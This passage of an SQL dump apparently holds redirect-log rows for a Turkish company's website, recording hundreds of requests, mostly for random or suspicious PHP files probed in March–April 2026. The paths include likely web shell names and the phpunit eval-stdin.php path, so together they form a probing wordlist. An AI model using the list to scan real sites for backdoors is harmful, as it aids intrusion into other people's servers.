00:00:00',301),(60183,'http://3s-technologies.com.tr/en/wp-admin/byp.php',NULL,'','',2,0,'2026-03-31 19:35:33','0000-00-00 00:00:00',301),(60184,'http://3s-technologies.com.tr/en/wp-content/wp-login.php',NULL,'','',2,0,'2026-03-31 19:35:34','0000-00-00 00:00:00',301),(60185,'http://3s-technologies.com.tr/en/admin/editor/engine.php',NULL,'','',2,0,'2026-03-31 19:35:35','0000-00-00 00:00:00',301),(60186,'http://3s-technologies.com.tr/en/images/lmfi2.php',NULL,'','',2,0,'2026-03-31 19:35:37','0000-00-00 00:00:00',301),(60187,'http://3s-technologies.com.tr/en/images/chosen.php',NULL,'','',2,0,'2026-03-31 19:35:40','0000-00-00 00:00:00',301),(60188,'https://3s-technologies.com.tr/tr/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2026-03-31 23:31:53','0000-00-00 00:00:00',301),(60189,'http://3s-technologies.com.tr/tr/0yellow.php',NULL,'','',8,0,'2026-04-01 05:55:13','0000-00-00 00:00:00',301),(60190,'http://3s-technologies.com.tr/tr/gvg1bvpsgtot1rpklcdefault.php',NULL,'','',19,0,'2026-04-01 05:55:15','0000-00-00 00:00:00',301),(60191,'http://3s-technologies.com.tr/tr/qiumnpor3orjwr6me3zmgqcdefault.php',NULL,'','',5,0,'2026-04-01 05:55:17','0000-00-00 00:00:00',301),(60192,'http://3s-technologies.com.tr/tr/hnphq.php',NULL,'','',5,0,'2026-04-01 05:55:18','0000-00-00 00:00:00',301),(60193,'http://3s-technologies.com.tr/tr/b4txckoieeyhynhsrpi9lcdefault.php',NULL,'','',7,0,'2026-04-01 05:55:19','0000-00-00 00:00:00',301),(60194,'http://3s-technologies.com.tr/tr/wp-class-20260318124352.php',NULL,'','',2,0,'2026-04-01 05:55:21','0000-00-00 00:00:00',301),(60195,'http://3s-technologies.com.tr/tr/q7lhrgzoo7ijhnkcedq2cdefault.php',NULL,'','',5,0,'2026-04-01 05:55:23','0000-00-00 00:00:00',301),(60196,'http://3s-technologies.com.tr/tr/kthusnjbc8ab0jiryls2jincdefault.php',NULL,'','',2,0,'2026-04-01 05:55:23','0000-00-00 00:00:00',301),(60197,'http://3s-technologies.com.tr/tr/only.php',NULL,'','',11,0,'2026-04-01 05:55:24','0000-00-00 00:00:00',301),(60198,'http://3s-technologies.com.tr/tr/repurify.php',NULL,'','',5,0,'2026-04-01 05:55:24','0000-00-00 00:00:00',301),(60199,'http://3s-technologies.com.tr/tr/tdsaz.php',NULL,'','',5,0,'2026-04-01 05:55:25','0000-00-00 00:00:00',301),(60200,'http://3s-technologies.com.tr/tr/hfles.php',NULL,'','',5,0,'2026-04-01 05:55:26','0000-00-00 00:00:00',301),(60201,'http://3s-technologies.com.tr/tr/wp-class-20260318122951.php',NULL,'','',2,0,'2026-04-01 05:55:28','0000-00-00 00:00:00',301),(60202,'http://3s-technologies.com.tr/tr/irpl4xz4fmlzm4tlvvu4h1mcdefault.php',NULL,'','',5,0,'2026-04-01 05:55:32','0000-00-00 00:00:00',301),(60203,'http://3s-technologies.com.tr/tr/wmore1.php',NULL,'','',37,0,'2026-04-01 05:55:33','0000-00-00 00:00:00',301),(60204,'http://3s-technologies.com.tr/tr/ibcqocdtu3eovdx2hwj7cdefault.php',NULL,'','',19,0,'2026-04-01 05:55:34','0000-00-00 00:00:00',301),(60205,'http://3s-technologies.com.tr/tr/less.php',NULL,'','',16,0,'2026-04-01 05:55:35','0000-00-00 00:00:00',301),(60206,'http://3s-technologies.com.tr/tr/t2gorhwasq4vioshtatw5ecdefault.php',NULL,'','',5,0,'2026-04-01 05:55:35','0000-00-00 00:00:00',301),(60207,'http://3s-technologies.com.tr/tr/new3.php',NULL,'','',23,0,'2026-04-01 05:55:36','0000-00-00 00:00:00',301),(60208,'http://3s-technologies.com.tr/tr/rogsa.php',NULL,'','',5,0,'2026-04-01 05:55:37','0000-00-00 00:00:00',301),(60209,'http://3s-technologies.com.tr/tr/htzevfl4k9ey5hoaywdwicdefault.php',NULL,'','',2,0,'2026-04-01 05:55:38','0000-00-00 00:00:00',301),(60210,'http://3s-technologies.com.tr/tr/sadcut1.php',NULL,'','',48,0,'2026-04-01 05:55:38','0000-00-00 00:00:00',301),(60211,'http://3s-technologies.com.tr/tr/nhj6t74aqmkde3hgpcdefault.php',NULL,'','',4,0,'2026-04-01 05:55:39','0000-00-00 00:00:00',301),(60212,'http://3s-technologies.com.tr/tr/wlld5fjtdpjmjhsds3qzmipfcdefault.php',NULL,'','',5,0,'2026-04-01 05:55:40','0000-00-00 00:00:00',301),(60213,'http://3s-technologies.com.tr/tr/ogifomnzqnlvwh5womfjirvacdefault.php',NULL,'','',19,0,'2026-04-01 05:55:40','0000-00-00 00:00:00',301),(60214,'http://3s-technologies.com.tr/tr/ynjli.php',NULL,'','',5,0,'2026-04-01 05:55:41','0000-00-00 00:00:00',301),(60215,'http://3s-technologies.com.tr/tr/mi35rzhmg1zj1vuxdefault.php',NULL,'','',19,0,'2026-04-01 05:55:42','0000-00-00 00:00:00',301),(60216,'http://3s-technologies.com.tr/tr/hbvdoz7cy9k6xge9zhuvkvitcdefault.php',NULL,'','',2,0,'2026-04-01 05:55:44','0000-00-00 00:00:00',301),(60217,'http://3s-technologies.com.tr/tr/exhds0ucw0ju9vjgasxqcdefault.php',NULL,'','',5,0,'2026-04-01 05:55:45','0000-00-00 00:00:00',301),(60218,'http://3s-technologies.com.tr/tr/lmutxdvyp7u5yksqke8ozbjgcdefault.php',NULL,'','',23,0,'2026-04-01 05:55:47','0000-00-00 00:00:00',301),(60219,'http://3s-technologies.com.tr/tr/ortasekerli1.php',NULL,'','',33,0,'2026-04-01 05:55:48','0000-00-00 00:00:00',301),(60220,'http://3s-technologies.com.tr/tr/index-20260330022921.php',NULL,'','',2,0,'2026-04-01 05:55:49','0000-00-00 00:00:00',301),(60221,'http://3s-technologies.com.tr/tr/wp-ccv.php',NULL,'','',8,0,'2026-04-01 05:55:51','0000-00-00 00:00:00',301),(60222,'http://3s-technologies.com.tr/tr/luyuc.php',NULL,'','',5,0,'2026-04-01 05:55:51','0000-00-00 00:00:00',301),(60223,'http://3s-technologies.com.tr/tr/xdd.php',NULL,'','',2,0,'2026-04-01 09:24:36','0000-00-00 00:00:00',301),(60224,'http://mail.3s-technologies.com.tr/tr/cdx2.php',NULL,'','',16,0,'2026-04-01 09:37:20','0000-00-00 00:00:00',301),(60225,'http://mail.3s-technologies.com.tr/tr/cdx1.php',NULL,'','',15,0,'2026-04-01 09:37:21','0000-00-00 00:00:00',301),(60226,'http://mail.3s-technologies.com.tr/tr/ahutr.php',NULL,'','',1,0,'2026-04-01 09:37:22','0000-00-00 00:00:00',301),(60227,'http://mail.3s-technologies.com.tr/tr/byrgo.php',NULL,'','',17,0,'2026-04-01 09:37:23','0000-00-00 00:00:00',301),(60228,'http://mail.3s-technologies.com.tr/tr/wp-asudo.php',NULL,'','',1,0,'2026-04-01 09:37:27','0000-00-00 00:00:00',301),(60229,'http://mail.3s-technologies.com.tr/tr/wp-moonka.php',NULL,'','',3,0,'2026-04-01 09:37:27','0000-00-00 00:00:00',301),(60230,'http://mail.3s-technologies.com.tr/tr/zlnckdxn.php',NULL,'','',2,0,'2026-04-01 09:37:29','0000-00-00 00:00:00',301),(60231,'http://mail.3s-technologies.com.tr/tr/wp-thi.php',NULL,'','',3,0,'2026-04-01 09:37:29','0000-00-00 00:00:00',301),(60232,'http://mail.3s-technologies.com.tr/tr/press.php',NULL,'','',19,0,'2026-04-01 09:37:30','0000-00-00 00:00:00',301),(60233,'http://mail.3s-technologies.com.tr/tr/vvedr.php',NULL,'','',1,0,'2026-04-01 09:37:35','0000-00-00 00:00:00',301),(60234,'http://mail.3s-technologies.com.tr/tr/htto.php',NULL,'','',5,0,'2026-04-01 09:37:39','0000-00-00 00:00:00',301),(60235,'http://mail.3s-technologies.com.tr/tr/xhejulap.php',NULL,'','',1,0,'2026-04-01 09:37:40','0000-00-00 00:00:00',301),(60236,'http://mail.3s-technologies.com.tr/tr/ddpxi.php',NULL,'','',1,0,'2026-04-01 09:37:43','0000-00-00 00:00:00',301),(60237,'http://mail.3s-technologies.com.tr/tr/cdkfu.php',NULL,'','',1,0,'2026-04-01 09:37:43','0000-00-00 00:00:00',301),(60238,'http://mail.3s-technologies.com.tr/tr/icc7p.php',NULL,'','',1,0,'2026-04-01 09:37:44','0000-00-00 00:00:00',301),(60239,'http://mail.3s-technologies.com.tr/tr/wp-temp.php',NULL,'','',9,0,'2026-04-01 09:37:46','0000-00-00 00:00:00',301),(60240,'http://mail.3s-technologies.com.tr/tr/0yellow.php',NULL,'','',8,0,'2026-04-01 11:40:45','0000-00-00 00:00:00',301),(60241,'http://mail.3s-technologies.com.tr/tr/gvg1bvpsgtot1rpklcdefault.php',NULL,'','',12,0,'2026-04-01 11:40:47','0000-00-00 00:00:00',301),(60242,'http://mail.3s-technologies.com.tr/tr/a9.php',NULL,'','',2,0,'2026-04-01 11:40:48','0000-00-00 00:00:00',301),(60243,'http://mail.3s-technologies.com.tr/tr/qiumnpor3orjwr6me3zmgqcdefault.php',NULL,'','',8,0,'2026-04-01 11:40:49','0000-00-00 00:00:00',301),(60244,'http://mail.3s-technologies.com.tr/tr/hnphq.php',NULL,'','',2,0,'2026-04-01 11:40:49','0000-00-00 00:00:00',301),(60245,'http://mail.3s-technologies.com.tr/tr/b4txckoieeyhynhsrpi9lcdefault.php',NULL,'','',9,0,'2026-04-01 11:40:50','0000-00-00 00:00:00',301),(60246,'http://mail.3s-technologies.com.tr/tr/aligk.php',NULL,'','',20,0,'2026-04-01 11:40:50','0000-00-00 00:00:00',301),(60247,'http://mail.3s-technologies.com.tr/tr/wp-class-20260318124352.php',NULL,'','',2,0,'2026-04-01 11:40:51','0000-00-00 00:00:00',301),(60248,'http://mail.3s-technologies.com.tr/tr/q7lhrgzoo7ijhnkcedq2cdefault.php',NULL,'','',8,0,'2026-04-01 11:40:53','0000-00-00 00:00:00',301),(60249,'http://mail.3s-technologies.com.tr/tr/kthusnjbc8ab0jiryls2jincdefault.php',NULL,'','',2,0,'2026-04-01 11:40:54','0000-00-00 00:00:00',301),(60250,'http://mail.3s-technologies.com.tr/tr/only.php',NULL,'','',9,0,'2026-04-01 11:40:54','0000-00-00 00:00:00',301),(60251,'http://mail.3s-technologies.com.tr/tr/repurify.php',NULL,'','',2,0,'2026-04-01 11:40:55','0000-00-00 00:00:00',301),(60252,'http://mail.3s-technologies.com.tr/tr/tdsaz.php',NULL,'','',2,0,'2026-04-01 11:40:55','0000-00-00 00:00:00',301),(60253,'http://mail.3s-technologies.com.tr/tr/hfles.php',NULL,'','',2,0,'2026-04-01 11:40:56','0000-00-00 00:00:00',301),(60254,'http://mail.3s-technologies.com.tr/tr/wp-class-20260318122951.php',NULL,'','',2,0,'2026-04-01 11:40:58','0000-00-00 00:00:00',301),(60255,'http://mail.3s-technologies.com.tr/tr/irpl4xz4fmlzm4tlvvu4h1mcdefault.php',NULL,'','',8,0,'2026-04-01 11:41:01','0000-00-00 00:00:00',301),(60256,'http://mail.3s-technologies.com.tr/tr/wmore1.php',NULL,'','',21,0,'2026-04-01 11:41:02','0000-00-00 00:00:00',301),(60257,'http://mail.3s-technologies.com.tr/tr/ibcqocdtu3eovdx2hwj7cdefault.php',NULL,'','',12,0,'2026-04-01 11:41:02','0000-00-00 00:00:00',301),(60258,'http://mail.3s-technologies.com.tr/tr/less.php',NULL,'','',7,0,'2026-04-01 11:41:03','0000-00-00 00:00:00',301),(60259,'http://mail.3s-technologies.com.tr/tr/t2gorhwasq4vioshtatw5ecdefault.php',NULL,'','',8,0,'2026-04-01 11:41:04','0000-00-00 00:00:00',301),(60260,'http://mail.3s-technologies.com.tr/tr/new3.php',NULL,'','',13,0,'2026-04-01 11:41:04','0000-00-00 00:00:00',301),(60261,'http://mail.3s-technologies.com.tr/tr/rogsa.php',NULL,'','',2,0,'2026-04-01 11:41:05','0000-00-00 00:00:00',301),(60262,'http://mail.3s-technologies.com.tr/tr/htzevfl4k9ey5hoaywdwicdefault.php',NULL,'','',2,0,'2026-04-01 11:41:06','0000-00-00 00:00:00',301),(60263,'http://mail.3s-technologies.com.tr/tr/sadcut1.php',NULL,'','',28,0,'2026-04-01 11:41:07','0000-00-00 00:00:00',301),(60264,'http://mail.3s-technologies.com.tr/tr/nhj6t74aqmkde3hgpcdefault.php',NULL,'','',3,0,'2026-04-01 11:41:07','0000-00-00 00:00:00',301),(60265,'http://mail.3s-technologies.com.tr/tr/wlld5fjtdpjmjhsds3qzmipfcdefault.php',NULL,'','',8,0,'2026-04-01 11:41:08','0000-00-00 00:00:00',301),(60266,'http://mail.3s-technologies.com.tr/tr/ogifomnzqnlvwh5womfjirvacdefault.php',NULL,'','',12,0,'2026-04-01 11:41:08','0000-00-00 00:00:00',301),(60267,'http://mail.3s-technologies.com.tr/tr/ynjli.php',NULL,'','',2,0,'2026-04-01 11:41:09','0000-00-00 00:00:00',301),(60268,'http://mail.3s-technologies.com.tr/tr/a6.php',NULL,'','',2,0,'2026-04-01 11:41:10','0000-00-00 00:00:00',301),(60269,'http://mail.3s-technologies.com.tr/tr/mi35rzhmg1zj1vuxdefault.php',NULL,'','',12,0,'2026-04-01 11:41:10','0000-00-00 00:00:00',301),(60270,'http://mail.3s-technologies.com.tr/tr/hbvdoz7cy9k6xge9zhuvkvitcdefault.php',NULL,'','',2,0,'2026-04-01 11:41:11','0000-00-00 00:00:00',301),(60271,'http://mail.3s-technologies.com.tr/tr/wziar1.php',NULL,'','',12,0,'2026-04-01 11:41:12','0000-00-00 00:00:00',301),(60272,'http://mail.3s-technologies.com.tr/tr/exhds0ucw0ju9vjgasxqcdefault.php',NULL,'','',8,0,'2026-04-01 11:41:13','0000-00-00 00:00:00',301),(60273,'http://mail.3s-technologies.com.tr/tr/a8.php',NULL,'','',2,0,'2026-04-01 11:41:14','0000-00-00 00:00:00',301),(60274,'http://mail.3s-technologies.com.tr/tr/lmutxdvyp7u5yksqke8ozbjgcdefault.php',NULL,'','',14,0,'2026-04-01 11:41:15','0000-00-00 00:00:00',301),(60275,'http://mail.3s-technologies.com.tr/tr/ortasekerli1.php',NULL,'','',25,0,'2026-04-01 11:41:16','0000-00-00 00:00:00',301),(60276,'http://mail.3s-technologies.com.tr/tr/a7.php',NULL,'','',27,0,'2026-04-01 11:41:16','0000-00-00 00:00:00',301),(60277,'http://mail.3s-technologies.com.tr/tr/index-20260330022921.php',NULL,'','',2,0,'2026-04-01 11:41:17','0000-00-00 00:00:00',301),(60278,'http://mail.3s-technologies.com.tr/tr/wp-ccv.php',NULL,'','',3,0,'2026-04-01 11:41:18','0000-00-00 00:00:00',301),(60279,'http://mail.3s-technologies.com.tr/tr/luyuc.php',NULL,'','',2,0,'2026-04-01 11:41:19','0000-00-00 00:00:00',301),(60280,'http://3s-technologies.com.tr/tr/q9it6sbfnet.php',NULL,'','',1,0,'2026-04-01 13:09:36','0000-00-00 00:00:00',301),(60281,'http://3s-technologies.com.tr/tr/ahda.php',NULL,'','',1,0,'2026-04-01 13:09:37','0000-00-00 00:00:00',301),(60282,'http://3s-technologies.com.tr/tr/eoew9g6opty.php',NULL,'','',1,0,'2026-04-01 13:09:39','0000-00-00 00:00:00',301),(60283,'http://3s-technologies.com.tr/tr/wp-kaori.php',NULL,'','',1,0,'2026-04-01 13:09:40','0000-00-00 00:00:00',301),(60284,'http://3s-technologies.com.tr/tr/treaq.php',NULL,'','',1,0,'2026-04-01 13:09:41','0000-00-00 00:00:00',301),(60285,'http://3s-technologies.com.tr/tr/czf4bk9smkw.php',NULL,'','',1,0,'2026-04-01 13:09:42','0000-00-00 00:00:00',301),(60286,'http://3s-technologies.com.tr/tr/uckhvk.php',NULL,'','',1,0,'2026-04-01 13:09:42','0000-00-00 00:00:00',301),(60287,'http://3s-technologies.com.tr/tr/izv8e3mkitr.php',NULL,'','',1,0,'2026-04-01 13:09:44','0000-00-00 00:00:00',301),(60288,'http://3s-technologies.com.tr/tr/ai5tgo4clps.php',NULL,'','',1,0,'2026-04-01 13:09:46','0000-00-00 00:00:00',301),(60289,'http://3s-technologies.com.tr/tr/upload2.php',NULL,'','',1,0,'2026-04-01 13:09:47','0000-00-00 00:00:00',301),(60290,'http://3s-technologies.com.tr/tr/phhdvrg63xp.php',NULL,'','',1,0,'2026-04-01 13:09:47','0000-00-00 00:00:00',301),(60291,'http://3s-technologies.com.tr/tr/lzrwgwwbx.php',NULL,'','',1,0,'2026-04-01 13:09:48','0000-00-00 00:00:00',301),(60292,'http://3s-technologies.com.tr/tr/bgvfaqskr2e.php',NULL,'','',1,0,'2026-04-01 13:09:49','0000-00-00 00:00:00',301),(60293,'http://3s-technologies.com.tr/tr/kons8dghctk.php',NULL,'','',1,0,'2026-04-01 13:09:49','0000-00-00 00:00:00',301),(60294,'http://3s-technologies.com.tr/tr/hmswbetgnfn.php',NULL,'','',1,0,'2026-04-01 13:09:50','0000-00-00 00:00:00',301),(60295,'http://3s-technologies.com.tr/tr/wp-admin-block.php',NULL,'','',1,0,'2026-04-01 13:09:51','0000-00-00 00:00:00',301),(60296,'http://3s-technologies.com.tr/tr/lycuhwitwex.php',NULL,'','',1,0,'2026-04-01 13:09:52','0000-00-00 00:00:00',301),(60297,'http://3s-technologies.com.tr/tr/fcqatnxewd.php',NULL,'','',1,0,'2026-04-01 13:09:53','0000-00-00 00:00:00',301),(60298,'http://3s-technologies.com.tr/tr/kwfcrhudyln.php',NULL,'','',1,0,'2026-04-01 13:09:56','0000-00-00 00:00:00',301),(60299,'http://3s-technologies.com.tr/tr/oddyejxshcy.php',NULL,'','',1,0,'2026-04-01 13:09:56','0000-00-00 00:00:00',301),(60300,'http://3s-technologies.com.tr/tr/qqkbfujk.php',NULL,'','',1,0,'2026-04-01 13:09:57','0000-00-00 00:00:00',301),(60301,'http://3s-technologies.com.tr/tr/bozjkosy.php',NULL,'','',1,0,'2026-04-01 13:09:58','0000-00-00 00:00:00',301),(60302,'http://3s-technologies.com.tr/tr/duavnf74ysb.php',NULL,'','',1,0,'2026-04-01 13:09:59','0000-00-00 00:00:00',301),(60303,'http://3s-technologies.com.tr/tr/ncljsh4jfcf.php',NULL,'','',1,0,'2026-04-01 13:10:01','0000-00-00 00:00:00',301),(60304,'http://3s-technologies.com.tr/tr/idnaencoder-term.php',NULL,'','',1,0,'2026-04-01 13:10:02','0000-00-00 00:00:00',301),(60305,'http://3s-technologies.com.tr/tr/dksuq.php',NULL,'','',1,0,'2026-04-01 13:10:02','0000-00-00 00:00:00',301),(60306,'http://3s-technologies.com.tr/tr/dx81kvjchrz.php',NULL,'','',1,0,'2026-04-01 13:10:03','0000-00-00 00:00:00',301),(60307,'http://3s-technologies.com.tr/tr/moylech45qg.php',NULL,'','',1,0,'2026-04-01 13:10:03','0000-00-00 00:00:00',301),(60308,'http://3s-technologies.com.tr/tr/emci6j1swd.php',NULL,'','',1,0,'2026-04-01 13:10:04','0000-00-00 00:00:00',301),(60309,'http://3s-technologies.com.tr/tr/dfr9bwnk2wb.php',NULL,'','',1,0,'2026-04-01 13:10:05','0000-00-00 00:00:00',301),(60310,'http://3s-technologies.com.tr/tr/cof.php',NULL,'','',1,0,'2026-04-01 13:10:06','0000-00-00 00:00:00',301),(60311,'http://3s-technologies.com.tr/tr/nzjsmtkho8u.php',NULL,'','',1,0,'2026-04-01 13:10:08','0000-00-00 00:00:00',301),(60312,'http://3s-technologies.com.tr/tr/up6nvptx3sa.php',NULL,'','',1,0,'2026-04-01 13:10:08','0000-00-00 00:00:00',301),(60313,'http://3s-technologies.com.tr/tr/last.php',NULL,'','',1,0,'2026-04-01 13:10:11','0000-00-00 00:00:00',301),(60314,'http://3s-technologies.com.tr/tr/ackujtcsdkq.php',NULL,'','',1,0,'2026-04-01 13:10:12','0000-00-00 00:00:00',301),(60315,'http://3s-technologies.com.tr/tr/wqdn5hnvetr.php',NULL,'','',1,0,'2026-04-01 13:10:13','0000-00-00 00:00:00',301),(60316,'http://3s-technologies.com.tr/tr/mgyqbv9nwbo.php',NULL,'','',1,0,'2026-04-01 13:10:14','0000-00-00 00:00:00',301),(60317,'http://3s-technologies.com.tr/tr/daxk4jbiiga.php',NULL,'','',1,0,'2026-04-01 13:10:15','0000-00-00 00:00:00',301),(60318,'http://3s-technologies.com.tr/tr/kt9i4sqzzvb.php',NULL,'','',1,0,'2026-04-01 13:10:15','0000-00-00 00:00:00',301),(60319,'http://3s-technologies.com.tr/tr/files_uploader.php',NULL,'','',1,0,'2026-04-01 13:10:16','0000-00-00 00:00:00',301),(60320,'http://3s-technologies.com.tr/tr/ow9kdzl1uhy.php',NULL,'','',1,0,'2026-04-01 13:10:17','0000-00-00 00:00:00',301),(60321,'http://3s-technologies.com.tr/tr/vngth1kujj.php',NULL,'','',1,0,'2026-04-01 13:10:18','0000-00-00 00:00:00',301),(60322,'http://3s-technologies.com.tr/tr/e2wxotzqgw8.php',NULL,'','',1,0,'2026-04-01 13:10:19','0000-00-00 00:00:00',301),(60323,'http://3s-technologies.com.tr/tr/jfs3ozinpkh.php',NULL,'','',1,0,'2026-04-01 13:10:20','0000-00-00 00:00:00',301),(60324,'http://3s-technologies.com.tr/tr/dpoagkcuvrb.php',NULL,'','',1,0,'2026-04-01 13:10:20','0000-00-00 00:00:00',301),(60325,'http://3s-technologies.com.tr/tr/wp-admin-css.php',NULL,'','',1,0,'2026-04-01 13:10:21','0000-00-00 00:00:00',301),(60326,'http://3s-technologies.com.tr/tr/zpfuwpevosg.php',NULL,'','',1,0,'2026-04-01 13:10:22','0000-00-00 00:00:00',301),(60327,'http://3s-technologies.com.tr/tr/travis_ot2q6wwb.php',NULL,'','',1,0,'2026-04-01 13:10:23','0000-00-00 00:00:00',301),(60328,'http://3s-technologies.com.tr/tr/ufztjgmy.php',NULL,'','',1,0,'2026-04-01 13:10:24','0000-00-00 00:00:00',301),(60329,'http://3s-technologies.com.tr/tr/cflsintdaf.php',NULL,'','',1,0,'2026-04-01 13:10:24','0000-00-00 00:00:00',301),(60330,'http://3s-technologies.com.tr/tr/lglqpxzb.php',NULL,'','',1,0,'2026-04-01 13:10:25','0000-00-00 00:00:00',301),(60331,'http://3s-technologies.com.tr/tr/gste4xfjrl5.php',NULL,'','',1,0,'2026-04-01 13:10:28','0000-00-00 00:00:00',301),(60332,'http://3s-technologies.com.tr/tr/entry-view.php',NULL,'','',1,0,'2026-04-01 13:10:28','0000-00-00 00:00:00',301),(60333,'http://3s-technologies.com.tr/tr/eravvs.php',NULL,'','',1,0,'2026-04-01 13:10:30','0000-00-00 00:00:00',301),(60334,'http://3s-technologies.com.tr/tr/jq3uskrgvpw.php',NULL,'','',1,0,'2026-04-01 13:10:32','0000-00-00 00:00:00',301),(60335,'http://3s-technologies.com.tr/tr/rqsdmrzwc6i.php',NULL,'','',1,0,'2026-04-01 13:10:32','0000-00-00 00:00:00',301),(60336,'http://3s-technologies.com.tr/tr/a3xgcwr65lm.php',NULL,'','',1,0,'2026-04-01 13:10:33','0000-00-00 00:00:00',301),(60337,'http://3s-technologies.com.tr/tr/spca2qamdhu.php',NULL,'','',1,0,'2026-04-01 13:10:34','0000-00-00 00:00:00',301),(60338,'http://3s-technologies.com.tr/tr/jtweh3qmp7d.php',NULL,'','',1,0,'2026-04-01 13:10:35','0000-00-00 00:00:00',301),(60339,'http://3s-technologies.com.tr/tr/rgcor73pnka.php',NULL,'','',1,0,'2026-04-01 13:10:36','0000-00-00 00:00:00',301),(60340,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp.php',NULL,'','',12,0,'2026-04-01 19:12:29','0000-00-00 00:00:00',301),(60341,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/cache/content.php',NULL,'','',6,0,'2026-04-01 19:12:31','0000-00-00 00:00:00',301),(60342,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/xmrlpc.php',NULL,'','',6,0,'2026-04-01 19:12:31','0000-00-00 00:00:00',301),(60343,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/wp-login.php',NULL,'','',12,0,'2026-04-01 19:12:32','0000-00-00 00:00:00',301),(60344,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/taptap-null.php',NULL,'','',6,0,'2026-04-01 19:12:33','0000-00-00 00:00:00',301),(60345,'http://mail.3s-technologies.com.tr/tr/.well-known/as.php',NULL,'','',6,0,'2026-04-01 19:12:33','0000-00-00 00:00:00',301),(60346,'http://mail.3s-technologies.com.tr/tr/wp-includes/customize/wp-login.php',NULL,'','',6,0,'2026-04-01 19:12:34','0000-00-00 00:00:00',301),(60347,'http://mail.3s-technologies.com.tr/tr/.well-known/lv.php',NULL,'','',6,0,'2026-04-01 19:12:35','0000-00-00 00:00:00',301),(60348,'http://mail.3s-technologies.com.tr/tr/cgi-bin/fm.php',NULL,'','',1,0,'2026-04-01 19:12:50','0000-00-00 00:00:00',301),(60349,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/system.php',NULL,'','',6,0,'2026-04-01 19:13:01','0000-00-00 00:00:00',301),(60350,'http://mail.3s-technologies.com.tr/tr/about/wp-conflg.php',NULL,'','',6,0,'2026-04-01 19:13:02','0000-00-00 00:00:00',301),(60351,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/alfa-rex.php',NULL,'','',6,0,'2026-04-01 19:13:03','0000-00-00 00:00:00',301),(60352,'http://mail.3s-technologies.com.tr/tr/cgi-bin/about.php',NULL,'','',1,0,'2026-04-01 19:13:04','0000-00-00 00:00:00',301),(60353,'http://mail.3s-technologies.com.tr/tr/wp-content/blue.php',NULL,'','',6,0,'2026-04-01 19:13:06','0000-00-00 00:00:00',301),(60354,'http://mail.3s-technologies.com.tr/tr/wp-content/configs.php',NULL,'','',6,0,'2026-04-01 19:13:07','0000-00-00 00:00:00',301),(60355,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/media/about.php',NULL,'','',6,0,'2026-04-01 19:13:07','0000-00-00 00:00:00',301),(60356,'http://mail.3s-technologies.com.tr/tr/wp-admin/plugin.php',NULL,'','',6,0,'2026-04-01 19:13:11','0000-00-00 00:00:00',301),(60357,'http://mail.3s-technologies.com.tr/tr/images/autoload_classmap.php',NULL,'','',6,0,'2026-04-01 19:13:12','0000-00-00 00:00:00',301),(60358,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/cache.php',NULL,'','',6,0,'2026-04-01 19:13:14','0000-00-00 00:00:00',301),(60359,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/install.php',NULL,'','',6,0,'2026-04-01 19:13:44','0000-00-00 00:00:00',301),(60360,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/chosen.php',NULL,'','',12,0,'2026-04-01 19:13:47','0000-00-00 00:00:00',301),(60361,'http://3s-technologies.com.tr/tr/cgi-bin/fm.php',NULL,'','',1,0,'2026-04-01 21:06:31','0000-00-00 00:00:00',301),(60362,'http://3s-technologies.com.tr/tr/class-bda.php',NULL,'','',11,0,'2026-04-01 23:56:19','0000-00-00 00:00:00',301),(60363,'https://3s-technologies.com.tr/tr/wc-api/v3/',NULL,'','',5,0,'2026-04-02 06:51:47','0000-00-00 00:00:00',301),(60364,'http://3s-technologies.com.tr/tr/.yuf.php',NULL,'','',5,0,'2026-04-02 11:47:34','0000-00-00 00:00:00',301),(60365,'http://3s-technologies.com.tr/tr/f35_s.php',NULL,'','',14,0,'2026-04-02 11:47:36','0000-00-00 00:00:00',301),(60366,'http://3s-technologies.com.tr/tr/2026w.php',NULL,'','',29,0,'2026-04-02 11:47:36','0000-00-00 00:00:00',301),(60367,'http://3s-technologies.com.tr/tr/file31.php',NULL,'','',5,0,'2026-04-02 11:47:37','0000-00-00 00:00:00',301),(60368,'http://3s-technologies.com.tr/tr/control.php',NULL,'','',6,0,'2026-04-02 11:47:38','0000-00-00 00:00:00',301),(60369,'http://3s-technologies.com.tr/tr/admin.php.',NULL,'','',13,0,'2026-04-02 13:07:18','0000-00-00 00:00:00',301),(60370,'http://www.3s-technologies.com.tr/tr/0yellow.php',NULL,'','',2,0,'2026-04-02 15:56:14','0000-00-00 00:00:00',301),(60371,'http://www.3s-technologies.com.tr/tr/dichku.php',NULL,'','',1,0,'2026-04-02 15:56:15','0000-00-00 00:00:00',301),(60372,'http://www.3s-technologies.com.tr/tr/gvg1bvpsgtot1rpklcdefault.php',NULL,'','',3,0,'2026-04-02 15:56:18','0000-00-00 00:00:00',301),(60373,'http://www.3s-technologies.com.tr/tr/a9.php',NULL,'','',1,0,'2026-04-02 15:56:19','0000-00-00 00:00:00',301),(60374,'http://www.3s-technologies.com.tr/tr/file61.php',NULL,'','',9,0,'2026-04-02 15:56:20','0000-00-00 00:00:00',301),(60375,'http://www.3s-technologies.com.tr/tr/qiumnpor3orjwr6me3zmgqcdefault.php',NULL,'','',2,0,'2026-04-02 15:56:20','0000-00-00 00:00:00',301),(60376,'http://www.3s-technologies.com.tr/tr/hnphq.php',NULL,'','',1,0,'2026-04-02 15:56:21','0000-00-00 00:00:00',301),(60377,'http://www.3s-technologies.com.tr/tr/b4txckoieeyhynhsrpi9lcdefault.php',NULL,'','',2,0,'2026-04-02 15:56:22','0000-00-00 00:00:00',301),(60378,'http://www.3s-technologies.com.tr/tr/aligk.php',NULL,'','',7,0,'2026-04-02 15:56:22','0000-00-00 00:00:00',301),(60379,'http://www.3s-technologies.com.tr/tr/jlex.php',NULL,'','',3,0,'2026-04-02 15:56:23','0000-00-00 00:00:00',301),(60380,'http://www.3s-technologies.com.tr/tr/wp-class-20260318124352.php',NULL,'','',1,0,'2026-04-02 15:56:24','0000-00-00 